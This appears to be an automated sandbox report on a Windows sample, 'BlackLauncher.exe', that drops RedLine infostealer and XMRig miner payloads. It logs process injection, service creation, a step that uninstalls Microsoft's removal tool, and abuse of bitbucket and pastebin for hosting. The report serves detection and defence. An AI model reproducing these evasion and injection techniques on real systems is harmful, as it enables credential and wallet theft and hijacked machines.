Malware Analysis Report

2025-03-15 04:58

Sample ID 240713-xq4v6atcjn
Target BlackLauncher.exe
SHA256 1d80f6a688af15e12116f444d8da85be020a3393aeaab885e4d0f8589ac23dc0
Tags
redline xmrig evasion execution infostealer miner persistence spyware upx
score
10/10

Analysis Overview

score
10/10

SHA256

1d80f6a688af15e12116f444d8da85be020a3393aeaab885e4d0f8589ac23dc0

Threat Level: Known bad

The file BlackLauncher.exe was found to be: Known bad.

Malicious Activity Summary

redline xmrig evasion execution infostealer miner persistence spyware upx

RedLine

RedLine payload

xmrig

XMRig Miner payload

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Creates new service(s)

Stops running service(s)

Blocklisted process makes network request

UPX packed file

Loads dropped DLL

Executes dropped EXE

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Drops file in Windows directory

Unsigned PE

Modifies data under HKEY_USERS

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: LoadsDriver

Suspicious use of SetWindowsHookEx

MITRE ATT&CK (Enterprise Matrix V15)

No technique mappings are included in this copy of the report.

Analysis: static1

Detonation Overview

Reported

2024-07-13 19:04

Signatures

Unsigned PE

No details recorded for this signature.

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-13 19:04

Reported

2024-07-13 19:07

Platform

win10-20240611-en

Max time kernel

151s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe"

Signatures

RedLine

infostealer redline

RedLine payload

No details recorded for this signature.

xmrig

miner xmrig

XMRig Miner payload

miner
10 matches, no details recorded.

Creates new service(s)

persistence execution

Downloads MZ/PE file

Stops running service(s)

evasion execution

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\ProgramData\Update\pROUy3v.exe N/A
N/A N/A C:\ProgramData\Update\vdVaFs5.exe N/A
N/A N/A C:\ProgramData\Windows11\Updater.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\ProgramData\Update\vdVaFs5.exe N/A

UPX packed file

upx
15 matches, no details recorded.

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Drops file in System32 directory

Two of the four rows are the dropped binaries opening C:\Windows\system32\MRT.exe (the Malicious Software Removal Tool) for modification, which fits the wusa /uninstall /kb:890830 step in the Processes section (KB890830 is the MSRT update). The two powershell.exe rows under config\systemprofile are PowerShell's own startup-profile and CLR usage-log files; they land in the SYSTEM profile because that PowerShell instance ran as LocalSystem.

Description Indicator Process Target
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\Update\pROUy3v.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\Windows11\Updater.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4304 set thread context of 1660 N/A C:\ProgramData\Update\vdVaFs5.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4724 set thread context of 3184 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\conhost.exe
PID 4724 set thread context of 4748 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\svchost.exe

Drops file in Windows directory

Both rows are taskmgr.exe refreshing its resource (.pri) cache under rescache\_merged. taskmgr.exe is not spawned by the sample (it appears in no WriteProcessMemory parent row below), so this is the analysis VM's own activity, not the sample's.

Description Indicator Process Target
File created C:\Windows\rescache\_merged\4183903823\2290032291.pri C:\Windows\system32\taskmgr.exe N/A
File created C:\Windows\rescache\_merged\1601268389\715946058.pri C:\Windows\system32\taskmgr.exe N/A

Checks SCSI registry key(s)

All three rows come from taskmgr.exe reading the disk's FriendlyName for its Performance tab, not from the sample; treat this signature as noise for this detonation.

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A

Modifies data under HKEY_USERS

Every key here sits under HKEY_USERS\.DEFAULT, the hive used by the LocalSystem account: these are CryptoAPI certificate-store and WinINet zone-map keys created on first use in a profile that had never used them. None of the values is malicious in itself; the useful signal is that powershell.exe and svchost.exe were running as SYSTEM, which fits the service-launched Updater.exe chain in the Processes section.

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\Update\pROUy3v.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\Update\pROUy3v.exe N/A
N/A N/A C:\ProgramData\Update\pROUy3v.exe N/A
N/A N/A C:\ProgramData\Update\pROUy3v.exe N/A
N/A N/A C:\ProgramData\Update\pROUy3v.exe N/A
N/A N/A C:\ProgramData\Update\pROUy3v.exe N/A
N/A N/A C:\ProgramData\Update\pROUy3v.exe N/A
N/A N/A C:\ProgramData\Update\pROUy3v.exe N/A
N/A N/A C:\ProgramData\Update\pROUy3v.exe N/A
N/A N/A C:\ProgramData\Update\pROUy3v.exe N/A
N/A N/A C:\ProgramData\Update\pROUy3v.exe N/A
N/A N/A C:\ProgramData\Windows11\Updater.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\Windows11\Updater.exe N/A
N/A N/A C:\ProgramData\Windows11\Updater.exe N/A
N/A N/A C:\ProgramData\Windows11\Updater.exe N/A
N/A N/A C:\ProgramData\Windows11\Updater.exe N/A
N/A N/A C:\ProgramData\Windows11\Updater.exe N/A
N/A N/A C:\ProgramData\Windows11\Updater.exe N/A
N/A N/A C:\ProgramData\Windows11\Updater.exe N/A
N/A N/A C:\ProgramData\Windows11\Updater.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A

Suspicious behavior: LoadsDriver

No details recorded for this signature.

Suspicious use of AdjustPrivilegeToken

Numeric entries are privilege LUIDs the sandbox did not resolve to a name; on Windows 10, 33 to 36 are SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege and SeDelegateSessionUserImpersonatePrivilege. The AUDIODG.EXE rows belong to the Windows audio engine, which is not part of the sample's process tree. The long runs for powershell.exe enable the complete privilege set of an elevated token; SeDebugPrivilege enabled by pROUy3v.exe is the one row attributable directly to a dropped binary.

Description Indicator Process Target
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Update\pROUy3v.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4396 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4396 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3500 wrote to memory of 4548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe
PID 3500 wrote to memory of 4548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe
PID 4548 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4548 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4548 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\Windows\SYSTEM32\cmd.exe
PID 4548 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\Windows\SYSTEM32\cmd.exe
PID 2876 wrote to memory of 2248 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 2248 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4548 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\Windows\SYSTEM32\cmd.exe
PID 4548 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\Windows\SYSTEM32\cmd.exe
PID 564 wrote to memory of 3388 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 3388 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4548 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\ProgramData\Update\pROUy3v.exe
PID 4548 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\ProgramData\Update\pROUy3v.exe
PID 4548 wrote to memory of 4304 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\ProgramData\Update\vdVaFs5.exe
PID 4548 wrote to memory of 4304 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\ProgramData\Update\vdVaFs5.exe
PID 4548 wrote to memory of 4304 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\ProgramData\Update\vdVaFs5.exe
PID 1760 wrote to memory of 3724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 1760 wrote to memory of 3724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 4304 wrote to memory of 1660 N/A C:\ProgramData\Update\vdVaFs5.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4304 wrote to memory of 1660 N/A C:\ProgramData\Update\vdVaFs5.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4304 wrote to memory of 1660 N/A C:\ProgramData\Update\vdVaFs5.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4304 wrote to memory of 1660 N/A C:\ProgramData\Update\vdVaFs5.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4304 wrote to memory of 1660 N/A C:\ProgramData\Update\vdVaFs5.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4304 wrote to memory of 1660 N/A C:\ProgramData\Update\vdVaFs5.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4304 wrote to memory of 1660 N/A C:\ProgramData\Update\vdVaFs5.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4304 wrote to memory of 1660 N/A C:\ProgramData\Update\vdVaFs5.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
